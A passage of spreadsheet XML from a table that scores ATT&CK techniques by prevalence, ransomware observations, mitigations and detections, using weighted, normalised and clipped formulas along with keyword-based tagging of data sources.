      <c r="AU46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2.9961073318216176</v>
      </c>
    </row>
    <row r="462" spans="1:47" ht="51">
      <c r="A462" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B462" s="37">
        <f t="shared" si="7"/>
        <v>200.75714285714287</v>
      </c>
      <c r="C462" s="37" t="s">
        <v>1615</v>
      </c>
      <c r="D462" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E462" s="37" t="s">
        <v>1616</v>
      </c>
      <c r="F462" s="37">
        <v>1</v>
      </c>
      <c r="G462" s="37">
        <v>1</v>
      </c>
      <c r="H462" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I462" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J462" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K462" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L462" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M462" s="37">
        <v>0</v>
      </c>
      <c r="N462" s="56">
        <v>0</v>
      </c>
      <c r="O462" s="56">
        <v>2</v>
      </c>
      <c r="P462" s="56">
        <v>0</v>
      </c>
      <c r="Q462" s="56">
        <v>0</v>
      </c>
      <c r="R462" s="57"/>
      <c r="S462" s="57">
        <v>0</v>
      </c>
      <c r="T462" s="57"/>
      <c r="U462" s="57">
        <v>0</v>
      </c>
      <c r="V462" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W462" s="37">
        <v>0</v>
      </c>
      <c r="X462" s="37">
        <v>0</v>
      </c>
      <c r="Y462" s="37">
        <v>0</v>
      </c>
      <c r="Z462" s="37">
        <v>2</v>
      </c>
      <c r="AA462" s="37">
        <v>0.02</v>
      </c>
      <c r="AB462" s="37">
        <v>0.02</v>
      </c>
      <c r="AC462" s="37"/>
      <c r="AD462" s="50" t="s">
        <v>1617</v>
      </c>
      <c r="AE462" s="37" t="str" cm="1">
        <f t="array" ref="AE462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF462" s="37">
        <v>458</v>
      </c>
      <c r="AG462" s="37" t="str" cm="1">
        <f t="array" ref="AG462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH462" s="37">
        <v>458</v>
      </c>
      <c r="AI462" s="37" t="str" cm="1">
        <f t="array" ref="AI462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD462)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ462" s="37">
        <v>458</v>
      </c>
      <c r="AK462" s="37" t="str" cm="1">
        <f t="array" ref="AK462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD462)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL462" s="37">
        <v>458</v>
      </c>
      <c r="AM462" s="37" t="str" cm="1">
        <f t="array" ref="AM462">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD462)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN462" s="37">
        <v>0</v>
      </c>
      <c r="AO462" s="37">
        <v>0</v>
      </c>
      <c r="AP462" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ462" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>66.919047619047618</v>
      </c>
      <c r="AR462" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS462" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT462" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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63" spans="1:47" ht="68">
      <c r="A463" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B463" s="37">
        <f t="shared" si="7"/>
        <v>428.63289595238098</v>
      </c>
      <c r="C463" s="37" t="s">
        <v>1618</v>
      </c>
      <c r="D463" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E463" s="37" t="s">
        <v>1619</v>
      </c>
      <c r="F463" s="37">
        <v>1</v>
      </c>
      <c r="G463" s="37">
        <v>1</v>
      </c>
      <c r="H463" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I463" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J463" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K463" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L463" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M463" s="37">
        <v>0</v>
      </c>
      <c r="N463" s="56">
        <v>0</v>
      </c>
      <c r="O463" s="56">
        <v>0</v>
      </c>
      <c r="P463" s="56">
        <v>0</v>
      </c>
      <c r="Q463" s="56">
        <v>0</v>
      </c>
      <c r="R463" s="57" t="s">
        <v>1620</v>
      </c>
      <c r="S463" s="57">
        <v>7</v>
      </c>
      <c r="T463" s="57" t="s">
        <v>1621</v>
      </c>
      <c r="U463" s="57">
        <v>7</v>
      </c>
      <c r="V463" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W463" s="37">
        <v>14</v>
      </c>
      <c r="X463" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y463" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z463" s="37">
        <v>0</v>
      </c>
      <c r="AA463" s="37">
        <v>0</v>
      </c>
      <c r="AB463" s="37">
        <v>0</v>
      </c>
      <c r="AC463" s="37"/>
      <c r="AD463" s="50" t="s">
        <v>1622</v>
      </c>
      <c r="AE463" s="37" t="str" cm="1">
        <f t="array" ref="AE463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD463)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF463" s="37">
        <v>459</v>
      </c>
      <c r="AG463" s="37" t="str" cm="1">
        <f t="array" ref="AG463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD463)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH463" s="37">
        <v>459</v>
      </c>
      <c r="AI463" s="37" t="str" cm="1">
        <f t="array" ref="AI463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD463)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ463" s="37">
        <v>459</v>
      </c>
      <c r="AK463" s="37" t="str" cm="1">
        <f t="array" ref="AK463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD463)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL463" s="37">
        <v>459</v>
      </c>
      <c r="AM463" s="37" t="str" cm="1">
        <f t="array" ref="AM463">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD463)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN463" s="37">
        <v>0</v>
      </c>
      <c r="AO463" s="37">
        <v>2</v>
      </c>
      <c r="AP463" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ463" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>142.87763198412699</v>
      </c>
      <c r="AR463" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS463" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT463" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU46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6.8513158087679509</v>
      </c>
    </row>
    <row r="464" spans="1:47" ht="17">
      <c r="A464" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B464" s="37">
        <f t="shared" si="7"/>
        <v>394.50017533333335</v>
      </c>
      <c r="C464" s="37" t="s">
        <v>1623</v>
      </c>
      <c r="D464" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E464" s="37" t="s">
        <v>1624</v>
      </c>
      <c r="F464" s="37">
        <v>1</v>
      </c>
      <c r="G464" s="37">
        <v>1</v>
      </c>
      <c r="H464" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I464" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J464" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K464" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L464" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M464" s="37">
        <v>0</v>
      </c>
      <c r="N464" s="56">
        <v>0</v>
      </c>
      <c r="O464" s="56">
        <v>0</v>
      </c>
      <c r="P464" s="56">
        <v>0</v>
      </c>
      <c r="Q464" s="56">
        <v>0</v>
      </c>
      <c r="R464" s="57" t="s">
        <v>734</v>
      </c>
      <c r="S464" s="57">
        <v>8</v>
      </c>
      <c r="T464" s="57" t="s">
        <v>1625</v>
      </c>
      <c r="U464" s="57">
        <v>4</v>
      </c>
      <c r="V464" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11428580952380953</v>
      </c>
      <c r="W464" s="37">
        <v>12</v>
      </c>
      <c r="X464" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y464" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z464" s="37">
        <v>0</v>
      </c>
      <c r="AA464" s="37">
        <v>0</v>
      </c>
      <c r="AB464" s="37">
        <v>0</v>
      </c>
      <c r="AC464" s="37"/>
      <c r="AD464" s="50" t="s">
        <v>1626</v>
      </c>
      <c r="AE464" s="37" t="str" cm="1">
        <f t="array" ref="AE464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD464)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF464" s="37">
        <v>460</v>
      </c>
      <c r="AG464" s="37" t="str" cm="1">
        <f t="array" ref="AG464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH464" s="37">
        <v>460</v>
      </c>
      <c r="AI464" s="37" t="str" cm="1">
        <f t="array" ref="AI464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD464)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ464" s="37">
        <v>460</v>
      </c>
      <c r="AK464" s="37" t="str" cm="1">
        <f t="array" ref="AK464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL464" s="37">
        <v>460</v>
      </c>
      <c r="AM464" s="37" t="str" cm="1">
        <f t="array" ref="AM464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN464" s="37">
        <v>0</v>
      </c>
      <c r="AO464" s="37">
        <v>0</v>
      </c>
      <c r="AP464" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ464" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>131.50005844444445</v>
      </c>
      <c r="AR464" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS464" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT464" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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65" spans="1:47" ht="34">
      <c r="A465" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B465" s="37">
        <f t="shared" si="7"/>
        <v>184.5</v>
      </c>
      <c r="C465" s="37" t="s">
        <v>1627</v>
      </c>
      <c r="D465" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E465" s="37" t="s">
        <v>1628</v>
      </c>
      <c r="F465" s="37">
        <v>1</v>
      </c>
      <c r="G465" s="37">
        <v>1</v>
      </c>
      <c r="H465" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I465" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J465" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K465" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L465" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M465" s="37">
        <v>0</v>
      </c>
      <c r="N465" s="56">
        <v>0</v>
      </c>
      <c r="O465" s="56">
        <v>0</v>
      </c>
      <c r="P465" s="56">
        <v>0</v>
      </c>
      <c r="Q465" s="56">
        <v>0</v>
      </c>
      <c r="R465" s="57"/>
      <c r="S465" s="57">
        <v>0</v>
      </c>
      <c r="T465" s="57" t="s">
        <v>1629</v>
      </c>
      <c r="U465" s="57">
        <v>0</v>
      </c>
      <c r="V465" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W465" s="37">
        <v>0</v>
      </c>
      <c r="X465" s="37">
        <v>0</v>
      </c>
      <c r="Y465" s="37">
        <v>0</v>
      </c>
      <c r="Z465" s="37">
        <v>0</v>
      </c>
      <c r="AA465" s="37">
        <v>0</v>
      </c>
      <c r="AB465" s="37">
        <v>0</v>
      </c>
      <c r="AC465" s="37"/>
      <c r="AD465" s="50" t="s">
        <v>1630</v>
      </c>
      <c r="AE465" s="37" t="str" cm="1">
        <f t="array" ref="AE465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD465)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF465" s="37">
        <v>461</v>
      </c>
      <c r="AG465" s="37" t="str" cm="1">
        <f t="array" ref="AG465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH465" s="37">
        <v>461</v>
      </c>
      <c r="AI465" s="37" t="str" cm="1">
        <f t="array" ref="AI465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD465)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ465" s="37">
        <v>461</v>
      </c>
      <c r="AK465" s="37" t="str" cm="1">
        <f t="array" ref="AK465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL465" s="37">
        <v>461</v>
      </c>
      <c r="AM465" s="37" t="str" cm="1">
        <f t="array" ref="AM465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN465" s="37">
        <v>0</v>
      </c>
      <c r="AO465" s="37"/>
      <c r="AP465" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ465" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.5</v>
      </c>
      <c r="AR465" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS465" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT465" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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66" spans="1:47" ht="34">
      <c r="A466" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B466" s="37">
        <f t="shared" si="7"/>
        <v>184.9</v>
      </c>
      <c r="C466" s="37" t="s">
        <v>1631</v>
      </c>
      <c r="D466" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E466" s="37" t="s">
        <v>1632</v>
      </c>
      <c r="F466" s="37">
        <v>1</v>
      </c>
      <c r="G466" s="37">
        <v>1</v>
      </c>
      <c r="H466" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I466" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J466" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K466" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L466" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M466" s="37">
        <v>0</v>
      </c>
      <c r="N466" s="56">
        <v>0</v>
      </c>
      <c r="O466" s="56">
        <v>0</v>
      </c>
      <c r="P466" s="56">
        <v>0</v>
      </c>
      <c r="Q466" s="56">
        <v>0</v>
      </c>
      <c r="R466" s="57"/>
      <c r="S466" s="57">
        <v>0</v>
      </c>
      <c r="T466" s="57" t="s">
        <v>1633</v>
      </c>
      <c r="U466" s="57">
        <v>0</v>
      </c>
      <c r="V466" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W466" s="37">
        <v>0</v>
      </c>
      <c r="X466" s="37">
        <v>0</v>
      </c>
      <c r="Y466" s="37">
        <v>0</v>
      </c>
      <c r="Z466" s="37">
        <v>0</v>
      </c>
      <c r="AA466" s="37">
        <v>0</v>
      </c>
      <c r="AB466" s="37">
        <v>0</v>
      </c>
      <c r="AC466" s="37"/>
      <c r="AD466" s="50" t="s">
        <v>210</v>
      </c>
      <c r="AE466" s="37" t="str" cm="1">
        <f t="array" ref="AE466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD466)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF466" s="37">
        <v>462</v>
      </c>
      <c r="AG466" s="37" t="str" cm="1">
        <f t="array" ref="AG466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH466" s="37">
        <v>462</v>
      </c>
      <c r="AI466" s="37" t="str" cm="1">
        <f t="array" ref="AI466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD466)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ466" s="37">
        <v>462</v>
      </c>
      <c r="AK466" s="37" t="str" cm="1">
        <f t="array" ref="AK466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL466" s="37">
        <v>462</v>
      </c>
      <c r="AM466" s="37" t="str" cm="1">
        <f t="array" ref="AM466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN466" s="37">
        <v>0</v>
      </c>
      <c r="AO466" s="37"/>
      <c r="AP466" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ466" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.633333333333333</v>
      </c>
      <c r="AR466" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS466" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT466" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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67" spans="1:47" ht="17">
      <c r="A467" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B467" s="37">
        <f t="shared" si="7"/>
        <v>2091.2428571428572</v>
      </c>
      <c r="C467" s="37" t="s">
        <v>1634</v>
      </c>
      <c r="D467" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E467" s="37" t="s">
        <v>1635</v>
      </c>
      <c r="F467" s="37">
        <v>1</v>
      </c>
      <c r="G467" s="37">
        <v>1</v>
      </c>
      <c r="H467" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I467" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J467" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K467" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L467" s="37">
